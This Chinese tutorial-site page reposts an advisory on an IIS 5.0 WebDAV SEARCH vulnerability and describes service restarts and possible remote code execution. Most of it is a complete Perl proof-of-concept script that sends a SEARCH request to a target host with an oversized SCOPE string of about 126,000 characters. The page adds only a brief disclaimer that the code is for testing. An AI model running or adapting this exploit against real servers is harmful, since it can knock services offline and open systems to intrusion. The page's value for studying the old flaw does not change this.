当前位置: 首页 > 图文教程 > 网络编程 > ASP > IIS 处理 SEARCH 请求漏洞

ASP
用ASP实现对Web搜索引擎Index Server的访问
ASP.NET数据库应用指南
利用ASP存取各种常用类型数据库(1)
利用ASP存取各种常用类型数据库(2)
利用ASP存取各种常用类型数据库(3)
利用ASP存取各种常用类型数据库(4)
利用ASP存取各种常用类型数据库(5)
利用ASP存取各种常用类型数据库(6)
一个简单的网上书城的例子(一)
一个简单的网上书城的例子(二)
一个简单的网上书城的例子(三)
一个简单的网上书城的例子(四)
一个简单的网上书城的例子(五)
一个简单的网上书城的例子(六)
一个简单的网上书城的例子(七)
一个简单的网上书城的例子(八)
用asp怎样编写文档搜索页面(1)
用asp怎样编写文档搜索页面(2)
用asp怎样编写文档搜索页面(3)
用asp怎样编写文档搜索页面(4)

ASP 中的 IIS 处理 SEARCH 请求漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 167 ::
收藏到网摘: n/a

  涉及程序:
IIS
  
描述:
通过构造特殊的 SEARCH 请求导致 IIS 执行攻击者代码漏洞
  
详细:
发现 IIS 在处理 SEARCH 请求时存在漏洞,攻击者通过提交构造特殊的 IIS SEARCH 请求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($xml);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影响系统:
IIS 5.0